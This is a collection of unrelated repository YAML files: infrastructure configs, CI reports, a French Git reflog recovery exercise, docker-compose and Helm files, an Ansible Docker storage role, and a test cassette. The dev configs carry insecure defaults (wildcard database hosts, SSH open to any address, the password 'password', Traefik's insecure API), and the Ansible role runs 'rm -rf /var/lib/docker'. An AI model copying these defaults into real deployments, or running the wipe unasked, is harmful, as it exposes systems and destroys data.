panko::db::mysql::allowed_hosts:
- '%'
- "%{hiera('mysql_bind_host')}"
|
puppet/services/panko-base.yaml
|
---
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-trigger-ad_hoc/23/
timestamp: 2016-07-11 22:26:57 UTC
duration: 1h4m9s
triggered_by: elliott-davis
active_duration: 1h3m45s
parameters:
GIT_REF: cdn/grayscale
EXPIRE_CACHE: false
change:
git_remote: <EMAIL>:opscode/delivery.git
git_commit: <PASSWORD>
project: delivery
version: 0.4.623+git.1.4e9aedb
stages:
delivery-promote:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-promote/320/
duration: 0s
delivery-test:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/636/
duration: 7m48s
runs:
el-6:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/architecture=x86_64,platform=el-6,project=delivery,role=tester/636/
duration: 7m47s
el-7:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/architecture=x86_64,platform=el-7,project=delivery,role=tester/636/
duration: 5m42s
ubuntu-12.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/architecture=x86_64,platform=ubuntu-12.04,project=delivery,role=tester/636/
duration: 5m25s
ubuntu-14.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-test/architecture=x86_64,platform=ubuntu-14.04,project=delivery,role=tester/636/
duration: 6m50s
delivery-build:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-build/787/
duration: 55m46s
runs:
el-6:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-build/architecture=x86_64,platform=el-6,project=delivery,role=builder/787/
duration: 55m35s
el-7:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-build/architecture=x86_64,platform=el-7,project=delivery,role=builder/787/
duration: 51m53s
ubuntu-12.04:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-build/architecture=x86_64,platform=ubuntu-12.04,project=delivery,role=builder/787/
duration: 43m52s
delivery-trigger-ad_hoc:
result: SUCCESS
url: http://wilson.ci.chef.co/job/delivery-trigger-ad_hoc/23/
duration: 10s
|
reports/wilson.ci.chef.co/job/delivery-trigger-ad_hoc/23.yaml
|
---
# ---------------------------------------------------------------------
# WARNING: This file is overwritten at deploy time with
# environment-specific stuff. Changes in here are only used by the dev
# VMs and not by a deployed environment.
# You probably want to make your change in pp-deployment, or in a
# role-* yaml file.
# ---------------------------------------------------------------------
domain_name: development.performance.service.gov.uk
pp_environment: dev
ssl_path: '/etc/ssl'
public_ssl_cert: 'certs/ssl-cert-snakeoil.pem'
public_ssl_key: 'private/ssl-cert-snakeoil.key'
environment_ssl_cert: 'certs/ssl-cert-snakeoil.pem'
environment_ssl_key: 'private/ssl-cert-snakeoil.key'
ufw_rules:
allowsshfromanywhere:
port: 22
ip: 'any'
fail2ban::whitelist_ips:
- 127.0.0.1
rabbitmq_sensu_password: '<PASSWORD>'
performanceplatform::base::dhparams: |
-----BEGIN DH PARAMETERS-----
MIICCAKCAgEA/w5nfBG0H8cM2Z2qTcUPzEewjj1iavtD7u8xUCYH8tViPpctWUne
HJ+Fc8Mkz+lgDfVkYtm33qhnuE6GLj9C00+yM0CZaZ0GXvR/DRXIXP//9ZZhtHRy
Tit7dWvTICR43TSIbYESt11ndGifIKsKhQklOnaCpaMvogky2R6NR0vbWdRXUbht
l5kv3PMYpBYb8DRoT3bfQVJB9QjzVbiq1qbyDtO9yYteIC2gTPTWDy4nBp8JbBTZ
ELRXxwEWLHzcxAl77fYcPMm0ynHnEN36EjqCl+YjczyL3by3f5zeUPYVMPWVeH2k
Pk2ocqb1oG9kLaRscV+dr8xLVtTGyysZ0GrO89vtV5uPRKi25lFvE1x6rXf+VLp8
HhKRT+aByJmas2sKJqCUKMwvUQOGW745l6bAchhiPyecura1AAeD4g3D1pIKGTFZ
8M3hCnvLmuWGL9BOFVIuWUhevxQnjAyV4A7LZ3n79sUAk4qki+UNKoQiHZSkNpXH
regGPBVgnFtZ5P0JEkQeSN3MP9GIN76mfuhvKGPmFOny5gfePoG1qmTKtewrUko/
KDSoX3gx9bOkFK31V/O5dgM70oj969lBoE+z4J86wHrlyIaDmQJ3BTIGpVJ97XC1
/ejsy0aBxmwX1/EMYjCQIIGydSoB7pY/C+WXkCMwgPOqIZq90MTz0NMCAQI=
-----END DH PARAMETERS-----
# Keep elasticsearch heapsize low in dev
performanceplatform::elasticsearch::heap_size: '256m'
performanceplatform::hosts::ip:
- "%{::ipaddress_eth1}"
postgresql::server::postgres_password: 'password'
pp_postgres::primary::stagecraft_password: "<PASSWORD>"
performanceplatform::pp_rabbitmq::transformer_password: '<PASSWORD>'
# Nginx configuration to restrict a vhost to the performance platform
pp_only_vhost: ""
|
hieradata/environment.yaml
|
accessible: true
author: <NAME>
context: |-
.. raw:: html
<script defer>
bodyHeight = 0;
function postSize() {
if (document.body.scrollHeight != bodyHeight) {
bodyHeight = document.body.scrollHeight;
window.parent.postMessage({height: document.body.scrollHeight}, "*");
}
};
var target = document.querySelector('body');
var observer = new MutationObserver(postSize);
var config = { attributes: true, subtree: true }
observer.observe(target, config);
$(document).ready(function(){
setTimeout(postSize, 0);
});
</script>
Imaginons que vous avez été imprudent en utilisant ``git reset --hard``
et que vous avez écrasé votre historique distant avec ``git push --force``.
Vous n'avez donc plus vos modifications dans le code, dans la ``staging zone``,
dans votre historique local ou dans votre historique distant.
Néanmoins, c'est rattrapable tant que vous n'avez pas supprimé le dossier ``.git``
de votre projet !
Pour cela vous devez utilisez les ``reference logs``, accessible avec ``git reflog``.
Ces logs contiennent tous les changements faits sur toutes les branches de votre historique.
Vous pouvez donc récupérer tous les commits que vous avez écrasés.
Une fois que vous avez identifié le point auquel vous voulez revenir,
il suffit d'utiliser ``git merge`` pour replacer les modifs dans votre repo
(et un traditionnel ``git push`` pour le repo distant).
environment: cpp
evaluate: best
groups: false
input_random: '0'
limits:
output: '2'
time: '30'
memory: '100'
name: Scénario Catastrophe Git 3 - Récupérer le code après avoir supprimé les modifs
de votre code, de l'historique local et distant
network_grading: false
order: 69
problems:
git-reflog:
name: ''
type: file
header: |-
Téléchargez l'`archive <https://inginious.org/course/git/git_catastrophy_scenario_3/git-reflog.zip>`_ qui contient déjà un repository cloné dans le sous-dossier `clone`. Votre repo a des historiques locaux et distants avec juste un commit suite à une mauvaise commande.
Utilisez ``reflog`` pour retrouver tous les commits effacés
et pusher-les sur le repository distant.
Une fois que c'est fait, ré-archivez le dossier complet et uploadez-le.
Notez que le repository "distant" dans cet exercice n'est pas sur github ou dans bitbucket mais dans le dossier `bare.git` de l'archive.
::
git-reflog/
├── bare.git/
| └── [...]
└── clone/
└── [...]
allowed_exts:
- .zip
stored_submissions: 0
submission_limit:
amount: -1
period: -1
tags: {}
weight: 1.0
|
git_catastrophy_scenario_3/task.yaml
|
controller_frequency: 3.0 # rate at which move_base will be called in Hz (default: 20.0)
planner_frequency: 0.5 # rate at which re-calculate the global path, in Hz (default: 0.0)
TrajectoryPlannerROS:
holonomic_robot: false
# Parameters for setting the velocity limits of the robot
max_vel_x: 0.3 # max fwd velocity allowed for the base in mt/s (default: 0.5)
min_vel_x: 0.05 # min fwd velocity allowed, should be high enough to overcome friction (default: 0.1)
# Parameters for evaluating possible local planner trajectories
pdist_scale: 3.0 # weighting for how much the local path should stay close to the global path (default: 0.6)
gdist_scale: 1.0 # weighting for how much the controller should attempt to reach its local goal, also controls speed (default 0.8)
occdist_scale: 0.2 # weighting for how much the controller should attempt to avoid obstacles (default 0.01)
meter_scoring: true # whether or not assume that goal_distance and path_distance are expressed in meters (default: false)
heading_scoring: false # Whether to score based on the robot's heading to the path or its distance from the path (default: false)
# Foward simulation parameters
# Parameters that determine how far in advance and with what granularity trajectories are simulated
sim_time: 3.5 # The amount of time (in sec) to forward-simulate trajectories, a higher value can result in slightly smoother trajectories (default: 0.025)
sim_granularity: 0.025 # The step size, in meters, to take between points on a given trajectory (default: 0.025)
# angular_sim_granularity: 0.5235987756 # The step size, in radians, to take between angular samples on a given trajectory
# 0.025 rad 1.4323944878 deg
# 0.0872664626 rad 5 deg
# 0.1745329252 rad 10 deg
# 0.2617993878 rad 15 deg
# 0.5235987756 rad 30 deg
# 0.7853981634 rad 45 deg
# 1.0471975512 rad 60 deg
# 1.5707963268 rad 90 deg
vx_samples: 20.0 # The number of samples to use when exploring the x velocity space (int, default: 3)
vtheta_samples: 40 # The number of samples to use when exploring the theta velocity space (int, default: 20)
# Goal Tolerance Parameters
yaw_goal_tolerance: 0.2617993878 # default is 0.05 rad (~3 degrees)
xy_goal_tolerance: 0.2 # in meters, (default: 0.1)
latch_xy_goal_tolerance: true # (default: false) if the goal position is reached it is considered permanently
controller_frequency: 10.0 # rate at which TrajectoryPlannerROS will be called in Hz
# debug parameters
publish_cost_grid_pc: false
|
config/base_local_planner_params.yaml
|
version: '2.1'
services:
elasticsearch:
image: huygensing/elasticsearch:5.6.5
ports:
- 9201:9200
indexer:
image: huygensing/timbuctoo-elasticsearch-indexer
environment:
indexer_elasticsearch_host: "http://elasticsearch:9200"
indexer_port: "80"
indexer_timbuctoo_graphql_endpoint: "http://timbuctoo/v5/graphql"
indexer_timbuctoo_login_endpoint: "http://timbuctoo/v2.1/authenticate"
timbuctoo_user: ""
timbuctoo_password: ""
ports:
- 3000:80
timbuctoo-gui:
image: huygensing/timbuctoo-gui:v5.7
environment:
REACT_APP_BACKEND_URL: "http://localhost:8080"
ports:
- 3006:80
timbuctoo:
image: huygensing/timbuctoo
command: sh -c "if ! [ -f /mapped-data/auth/users.json ]; then mkdir -p /mapped-data/auth; echo '[{\"@type\":\"user\",\"displayName\":\"givenNamesurname\",\"persistentId\":\"pid\",\"_id\":\"bc75a716-7965-49b5-bb93-68004ba0d900\"}]' > /mapped-data/auth/users.json; fi; if ! [ -f /mapped-data/auth/logins.json ]; then mkdir -p /mapped-data/auth; echo '[{\"@type\":\"login\",\"userPid\":\"pid\",\"password\":\"<PASSWORD>=\",\"salt\":\"<PASSWORD>\",\"userName\":\"user\",\"givenName\":\"givenName\",\"surName\":\"surname\",\"emailAddress\":\"email\",\"organization\":\"organization\"}]' > /mapped-data/auth/logins.json; fi; if ! [ -f /mapped-data/datasets/authorizations.json ]; then mkdir -p /mapped-data/datasets; echo '[{\"vreId\":\"indexer\",\"userId\":\"pid\",\"roles\":[\"USER\"]}]' > /mapped-data/datasets/authorizations.json; fi; /app/bin/timbuctoo server /app/example_config.yaml"
environment:
timbuctoo_elasticsearch_host: elasticsearch
timbuctoo_elasticsearch_port: 9200
base_uri: http://localhost:8080
JAVA_OPTS: ${JAVA_OPTS}
timbuctoo_dataPath: ${timbuctoo_dataPath:-/mapped-data}
timbuctoo_authPath: ${timbuctoo_authPath:-/mapped-data/auth}
volumes:
- ./timbuctoo-data/:/mapped-data
ports:
- 8080:80
- 8081:81
timbuctoo-editor:
build:
context: ./php-apache
ports:
- 8888:80
volumes:
- ./timpars:/var/www/html
|
src/documentation/timbuctoo_configuration/inTimbuctoo/docker-compose.yml
|
version: "3.3"
services:
traefik:
# build:
# context: .
image: traefik:v2.5.5
container_name: "traefik"
command:
#- "--log.level=DEBUG"
- "--api.insecure=true"
- "--providers.docker=true"
- "--entrypoints.web.address=:80"
# Load ldapAuth from local private plugins format ===============================#
# https://github.com/traefik/traefik/pull/8224 #
# "A plugin must be declared in the static configuration" #
# https://doc.traefik.io/traefik-pilot/plugins/overview/#installing-plugins #
- "--experimental.localPlugins.ldapAuth.moduleName=github.com/wiltonsr/ldapAuth" #
# ===============================================================================#
ports:
- "80:80"
- "8080:8080"
volumes:
- "/var/run/docker.sock:/var/run/docker.sock:ro"
- "../../ldapAuth:/plugins-local/src/github.com/wiltonsr/ldapAuth:ro"
whoami:
image: "traefik/whoami"
container_name: "whoami"
labels:
- traefik.http.routers.whoami.rule=Host(`whoami.localhost`)
- traefik.http.routers.whoami.entrypoints=web
# ldapAuth Register Middleware ====================================================================
- traefik.http.routers.whoami.middlewares=ldap_auth
# ldapAuth Options=================================================================================
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.logLevel=DEBUG
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.debug=true
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.url=ldap://ldap.forumsys.com
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.port=389
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.baseDN=dc=example,dc=com
- traefik.http.middlewares.ldap_auth.plugin.ldapAuth.attribute=uid
# SearchFilter must not escape curly braces when using labels
# - traefik.http.middlewares.ldap_auth.plugin.ldapAuth.searchFilter=({{.Attribute}}={{.Username}})
# =================================================================================================
|
examples/conf-from-labels.yml
|
nameWithType: FabricReplicator.updateEpochAsync
type: method
members:
- fullName: system.fabric.FabricReplicator.updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
name: updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
nameWithType: FabricReplicator.updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
overridden: system.fabric.Replicator.updateEpochAsync(Epoch,CancellationToken)
parameters:
- description: <p>This supports the Service Fabric infrastructure and is not meant to be used directly from your code. </p>
name: epoch
type: <xref href="system.fabric.Epoch?alt=system.fabric.Epoch&text=Epoch" data-throw-if-not-resolved="False"/>
- description: <p>The <xref uid="system.fabric.CancellationToken" data-throw-if-not-resolved="false" data-raw-source="system.fabric.CancellationToken"></xref> object that the operation is observing. It can be used to send a notification that the operation should be canceled. Note that cancellation is advisory and that the operation might still be completed even if it is canceled. </p>
name: cancellationToken
type: <xref href="system.fabric.CancellationToken?alt=system.fabric.CancellationToken&text=CancellationToken" data-throw-if-not-resolved="False"/>
returns:
description: <p>This supports the Service Fabric infrastructure and is not meant to be used directly from your code. The future completes exceptionally with <xref uid="" data-throw-if-not-resolved="false" data-raw-source="FabricException"></xref> for fabric related failures. </p>
type: <xref href="CompletableFuture?alt=CompletableFuture&text=CompletableFuture" data-throw-if-not-resolved="False"/>
summary: <p>This supports the Service Fabric infrastructure and is not meant to be used directly from your code. </p>
syntax: public CompletableFuture updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
uid: system.fabric.FabricReplicator.updateEpochAsync(Epoch,CancellationToken)
uid: system.fabric.FabricReplicator.updateEpochAsync*
fullName: system.fabric.FabricReplicator.updateEpochAsync
name: updateEpochAsync(Epoch epoch, CancellationToken cancellationToken)
package: system.fabric
metadata: {}
|
legacy/docs-ref-autogen/system.fabric.FabricReplicator.updateEpochAsync.yml
|
description: |
Package the helm chart(s).
You can add multiple chart repos by defining the following environment variable in your context
CT_CHART_REPOS=repo_name1=repo_url1,repo_name2=repo_url2
parameters:
chart_test_config:
description: |
Path to local config file with settings to be used by Chart Tester
For example:
helm-extra-args: --timeout 600
validate-maintainers: false
type: string
default: ".circleci/helmTestConfig.yaml"
chart_dir_override:
description: |
Due to 'ct list-changed' not working on master (see https://github.com/helm/chart-testing/pull/159)
Need get changed charts through git command.
Defaulting to searching in 'helm' dir to look for changes.
type: string
default: "helm"
chart_package_path:
description: The path where packaged charts will be saved (defaults to a local, relative path)
type: string
default: ".cr-release-packages"
chart_stable_branch:
description: The branch that should be used to store a chart in stable repository
type: string
default: "master"
steps:
- run:
shell: /bin/sh
command: |
set -e
# Package up the chart to <<parameters.chart_package_path>>.
#
# $ package_chart chart/path
#
function package_chart {
chart=$1
echo "Packaging chart: '$chart'..."
helm dependency build "$chart"
# set the version different for incubator
if [ "$CIRCLE_BRANCH" == <<parameters.chart_stable_branch>> ]; then
helm package "$chart" --destination <<parameters.chart_package_path>>
else
ver=$(helm inspect chart "$chart" | grep version | cut -d' ' -f2)
[[ -z $CIRCLE_TAG ]] && BRANCH="$CIRCLE_BRANCH" || BRANCH="$CIRCLE_TAG"
VERSION="$(echo "${ver}-${BRANCH}" | sed -r 's/[\/=_#]+/-/g')" | tr -d " \t\n\r"
echo "packaging $chart with version: ${VERSION}"
helm package "$chart" -u --version "${VERSION}" --destination .cr-release-packages
fi
echo "'$chart' packaged"
echo "-----"
}
helm version -c
if [ "$CT_CHART_REPOS" ]; then
for i in $(echo $CT_CHART_REPOS | tr "," " ");
do
repo_name=$(echo "$i" | cut -d'=' -f1)
repo_url=$(echo "$i" | cut -d'=' -f2)
helm repo add $repo_name $repo_url
done
fi
rm -rf <<parameters.chart_package_path>>; mkdir <<parameters.chart_package_path>>
# 'ct list-changed' doesn't work on main branch
# see https://github.com/helm/chart-testing/pull/159
if [ "$CIRCLE_BRANCH" == <<parameters.chart_stable_branch>> ]; then
git diff --diff-filter=d --name-only $(git merge-base HEAD^ HEAD) -- <<parameters.chart_dir_override>> | while IFS= read -r file ; do
if echo "$file" | grep -q "/Chart.yaml"; then
chart=$(echo "$file" | sed 's/\/Chart.yaml$//')
package_chart $chart
fi
done
else
ct list-changed --config <<parameters.chart_test_config>> | while IFS= read -r chart ; do
chart=$(echo $chart | sed 's/.*Skipping...//g' | sed 's/Version increment checking disabled.//g')
if [ "$chart" == "" ]; then
continue
fi
package_chart $chart
done
fi
name: "[helm] Package"
|
src/helm/commands/package.yaml
|
url: https://googledrive.tidyverse.org
template:
package: tidytemplate
home:
strip_header: true
authors:
<NAME>:
href: https://jennybryan.org
navbar:
components:
home: ~
news:
text: News
menu:
- text: "Blog posts"
- text: "Version 1.0.0"
href: https://www.tidyverse.org/blog/2019/08/googledrive-1-0-0/
- text: "------------------"
- text: "Change log"
href: news/index.html
reference:
- title: "Reach out and touch your files"
desc: >
Retrieve metadata on your Drive files so you can act on them
contents:
- drive_find
- drive_ls
- drive_get
- drive_reveal
- drive_browse
- title: "File creation and deletion"
desc: >
Create or delete Drive files and folders
contents:
- drive_upload
- drive_put
- drive_download
- drive_create
- drive_mkdir
- drive_cp
- drive_mv
- drive_rename
- drive_update
- drive_trash
- drive_empty_trash
- drive_rm
- drive_example
- title: "Share your files with the world"
desc: >
View or change the sharing and publishing status of Drive files
contents:
- drive_publish
- drive_unpublish
- drive_share
- drive_reveal
- drive_link
- title: "Team Drives"
desc: >
Manipulate and explore Team Drives
contents:
- team_drives
- team_drive_find
- team_drive_get
- team_drive_create
- team_drive_rm
- team_drive_update
- as_team_drive
- title: "Dribble object"
desc: >
Metadata about Drive files is stored in a "Drive tibble" a.k.a. a dribble
contents:
- dribble
- as_dribble
- as_id
- dribble-checks
- title: "Authorization"
desc: >
Take explicit control of the Google auth status or examine current state
contents:
- drive_user
- drive_about
- drive_auth
- drive_deauth
- drive_auth_configure
- title: "Drive API spec"
desc: >
Summon info about or check input against the Drive API spec
contents:
- starts_with("drive_endpoint")
- drive_extension
- drive_fields
- drive_mime_type
- expose
- title: "Programming around the Drive API"
desc: >
Low-level functions used internally and made available for programming
contents:
- request_generate
- request_make
- do_request
- do_paginated_request
- drive_api_key
- drive_token
- drive_has_token
|
_pkgdown.yml
|
apiVersion: apps/v1
kind: Deployment
metadata:
name: {{ .Values.jupyterhub.name }}
labels:
{{- include "sqlflow.labels" . | nindent 4 }}
spec:
selector:
matchLabels:
{{- include "sqlflow.selectorLabels" . | nindent 6 }}
{{- if .Values.jupyterhub.strategy }}
strategy:
{{ toYaml .Values.jupyterhub.strategy | trim | indent 4 }}
{{ if eq .Values.jupyterhub.strategy.type "Recreate" }}rollingUpdate: null{{ end }}
{{- end }}
template:
metadata:
{{- with .Values.jupyterhub.podAnnotations }}
annotations:
{{- toYaml . | nindent 8 }}
{{- end }}
labels:
{{- include "sqlflow.selectorLabels" . | nindent 8 }}
spec:
{{- with .Values.imagePullSecrets }}
imagePullSecrets:
{{- toYaml . | nindent 8 }}
{{- end }}
serviceAccountName: {{ include "jupyterhub.serviceAccountName" . }}
securityContext:
{{- toYaml .Values.jupyterhub.podSecurityContext | nindent 8 }}
containers:
- name: {{ .Values.jupyterhub.image.name }}
securityContext:
{{- toYaml .Values.jupyterhub.securityContext | nindent 12 }}
image: {{ .Values.jupyterhub.image.repository }}
imagePullPolicy: {{ .Values.jupyterhub.image.pullPolicy }}
env: {{- toYaml .Values.jupyterhub.env | nindent 12 }}
ports:
- name: http
containerPort: {{ .Values.jupyterhub.service.servicePort }}
protocol: TCP
# livenessProbe:
# httpGet:
# path: /health
# port: http
# readinessProbe:
# httpGet:
# path: /health
# port: http
resources:
{{- toYaml .Values.jupyterhub.resources | nindent 12 }}
volumes:
- name: {{ .Values.jupyterhub.persistentVolume.name }}
hostPath:
path: {{ .Values.jupyterhub.persistentVolume.mountPath }}
type: {{ .Values.jupyterhub.persistentVolume.type }}
{{- with .Values.jupyterhub.nodeSelector }}
nodeSelector:
{{- toYaml . | nindent 8 }}
{{- end }}
{{- with .Values.jupyterhub.affinity }}
affinity:
{{- toYaml . | nindent 8 }}
{{- end }}
{{- with .Values.jupyterhub.tolerations }}
tolerations:
{{- toYaml . | nindent 8 }}
{{- end }}
|
sqlflow/templates/sqlflow-jupyterhub/deployment.yaml
|
---
- name: Ensure docker is installed
action: "{{ ansible_pkg_mgr }} name={{ item }} state=present"
with_items:
- docker-1.8.2
# Docker doesn't seem to start cleanly the first time run
# when loopback (not directlvm) is configured. Putting in an
# ignore errors, and then sleeping till it can come up cleanly
- name: Try to start docker. This might fail (loopback startup issue)
service:
name: docker
state: started
ignore_errors: yes
- name: Pause for 1 minute
pause:
seconds: 30
- name: Ensure docker is started
service:
name: docker
state: started
- name: Determine if loopback
shell: docker info | grep 'Data file:.*loop'
register: loop_device_check
ignore_errors: yes
- debug:
var: loop_device_check
- name: fail if we don't detect loopback
fail:
msg: loopback not detected! Please investigate manually.
when: loop_device_check.rc == 1
- name: "check to see if {{ dss_docker_device }} exists"
command: "test -e {{ dss_docker_device }}"
register: docker_dev_check
ignore_errors: yes
- debug: var=docker_dev_check
- name: "fail if {{ dss_docker_device }} doesn't exist"
fail:
msg: "{{ dss_docker_device }} doesn't exist. Please investigate"
when: docker_dev_check.rc != 0
- name: stop docker
service:
name: docker
state: stopped
- name: delete /var/lib/docker
command: rm -rf /var/lib/docker
- name: remove /var/lib/docker
command: rm -rf /var/lib/docker
- name: copy the docker-storage-setup config file
copy:
content: >
DEVS={{ dss_docker_device }}\n
VG=docker_vg
dest: /etc/sysconfig/docker-storage-setup
owner: root
group: root
mode: 0664
- name: docker storage setup
command: docker-storage-setup
register: docker_storage_setup_output
- debug:
msg: "{{ docker_storage_setup_output }}"
- name: extend the vg
command: lvextend -l 90%VG /dev/docker_vg/docker-pool
register: lvextend_output
- debug:
msg: "{{ lvextend_output }}"
- name: start docker
service:
name: docker
state: restarted
- name: docker info
command: docker info
register: dockerinfo
- debug:
msg: "{{ dockerinfo }}"
|
openshift/installer/vendored/openshift-ansible-git-2016-04-18/roles/docker_storage_setup/tasks/main.yml
|
preprocess:
task: summarization # task', metavar='TASK', default="translation", choices=TASK_REGISTRY.keys(), help='task'
source_lang:
# list, ujson.loads
- code_tokens
- docstring_tokens
- sbt
- sbtao
# path and path.terminals
- path
- path.terminals
# - binary_ast # traverse ast's leaf node info
- traversal
target_lang: ~ #", default=None, metavar="TARGET", help="target language"
# ~ path for dataset default. e.g. for code_search_net, ~/filter = ~/.ncc/code_search_net/filter
dataprefs:
ruby:
trainpref: ~/.ncc/code_search_net/filter/ruby/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/ruby/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/ruby/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
go:
trainpref: ~/.ncc/code_search_net/filter/go/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/go/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/go/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
java:
trainpref: ~/.ncc/code_search_net/filter/java/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/java/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/java/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
javascript:
trainpref: ~/.ncc/code_search_net/filter/javascript/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/javascript/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/javascript/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
python:
trainpref: ~/.ncc/code_search_net/filter/python/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/python/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/python/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
php:
trainpref: ~/.ncc/code_search_net/filter/php/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/code_search_net/filter/php/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/code_search_net/filter/php/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
csharp:
trainpref: ~/.ncc/codenn/filter/csharp/train #", metavar="FP", default=None, help="train file prefix"
validpref: ~/.ncc/codenn/filter/csharp/valid #", metavar="FP", default=None, help="comma separated, valid file prefixes"
testpref: ~/.ncc/codenn/filter/csharp/test #", metavar="FP", default=None, help="comma separated, test file prefixes"
dataset_impl: mmap #', metavar='FORMAT', default='mmap', choices=get_available_dataset_impl(), help='output dataset implementation'
destdir: ~/.ncc/kd/summarization/ #", metavar="DIR", default="data-bin", help="destination dir"
# word frequency
thresholdtgt: 0 #", metavar="N", default=0, type=int, help="map words appearing less than threshold times to unknown"
thresholdsrc: 0 #", metavar="N", default=0, type=int, help="map words appearing less than threshold times to unknown"
# word number
# nwordstgt: -1 #", metavar="N", default=-1, type=int, help="number of target words to retain"
# nwordssrc: -1 #", metavar="N", default=-1, type=int, help="number of source words to retain"
nwordstgt: 50000 #", metavar="N", default=-1, type=int, help="number of target words to retain"
nwordssrc: 50000 #", metavar="N", default=-1, type=int, help="number of source words to retain"
alignfile: ~ #", metavar="ALIGN", default=None, help="an alignment file (optional)"
joined_dictionary: 0 # ", action="store_true", help="Generate joined dictionary"
only_source: 0 # ", action="store_true", help="Only process the source language"
padding_factor: 8 #", metavar="N", default=8, type=int, help="Pad dictionary size to be multiple of N"
workers: 24 # ", metavar="N", default=1, type=int, help="number of parallel workers"
|
dataset/codesearchnet/summarization/config/preprocess_multilingual.yml
|
---
http_interactions:
- request:
method: get
uri: http://gateway.marvel.com/v1/public/stories?apikey=<API_KEY>&hash=<HASH>&limit=1&ts=<TS>
body:
encoding: US-ASCII
string: ''
headers:
User-Agent:
- Faraday v0.12.0.1
Accept-Encoding:
- gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept:
- "*/*"
response:
status:
code: 200
message: OK
headers:
Etag:
- fae6745c6796ade5b090b7b83a7702eeb750b4eb
Content-Type:
- application/json; charset=utf-8
Date:
- Sun, 09 Apr 2017 19:45:21 GMT
Connection:
- keep-alive
Transfer-Encoding:
- chunked
body:
encoding: ASCII-8BIT
string: !binary |-
eyJjb2RlIjoyMDAsInN0YXR1cyI6Ik9rIiwiY29weXJpZ2h0IjoiwqkgMjAx
NyBNQVJWRUwiLCJhdHRyaWJ1dGlvblRleHQiOiJEYXRhIHByb3ZpZGVkIGJ5
IE1hcnZlbC4gwqkgMjAxNyBNQVJWRUwiLCJhdHRyaWJ1dGlvbkhUTUwiOiI8
YSBocmVmPVwiaHR0cDovL21hcnZlbC5jb21cIj5EYXRhIHByb3ZpZGVkIGJ5
IE1hcnZlbC4gwqkgMjAxNyBNQVJWRUw8L2E+IiwiZXRhZyI6ImZhZTY3NDVj
Njc5NmFkZTViMDkwYjdiODNhNzcwMmVlYjc1MGI0ZWIiLCJkYXRhIjp7Im9m
ZnNldCI6MCwibGltaXQiOjEsInRvdGFsIjo4NzQ3NSwiY291bnQiOjEsInJl
c3VsdHMiOlt7ImlkIjo3LCJ0aXRsZSI6IkludmVzdGlnYXRpbmcgdGhlIG11
cmRlciBvZiBhIHRlZW5hZ2UgZ2lybCwgQ2FnZSBzdWRkZW5seSBsZWFybnMg
dGhhdCBhIHRocmVlLXdheSBnYW5nIHdhciBpcyB1bmRlciB3YXkgZm9yIGNv
bnRyb2wgb2YgdGhlIHR1cmYiLCJkZXNjcmlwdGlvbiI6IiIsInJlc291cmNl
VVJJIjoiaHR0cDovL2dhdGV3YXkubWFydmVsLmNvbS92MS9wdWJsaWMvc3Rv
cmllcy83IiwidHlwZSI6InN0b3J5IiwibW9kaWZpZWQiOiIxOTY5LTEyLTMx
VDE5OjAwOjAwLTA1MDAiLCJ0aHVtYm5haWwiOm51bGwsImNyZWF0b3JzIjp7
ImF2YWlsYWJsZSI6MCwiY29sbGVjdGlvblVSSSI6Imh0dHA6Ly9nYXRld2F5
Lm1hcnZlbC5jb20vdjEvcHVibGljL3N0b3JpZXMvNy9jcmVhdG9ycyIsIml0
ZW1zIjpbXSwicmV0dXJuZWQiOjB9LCJjaGFyYWN0ZXJzIjp7ImF2YWlsYWJs
ZSI6MCwiY29sbGVjdGlvblVSSSI6Imh0dHA6Ly9nYXRld2F5Lm1hcnZlbC5j
b20vdjEvcHVibGljL3N0b3JpZXMvNy9jaGFyYWN0ZXJzIiwiaXRlbXMiOltd
LCJyZXR1cm5lZCI6MH0sInNlcmllcyI6eyJhdmFpbGFibGUiOjEsImNvbGxl
Y3Rpb25VUkkiOiJodHRwOi8vZ2F0ZXdheS5tYXJ2ZWwuY29tL3YxL3B1Ymxp
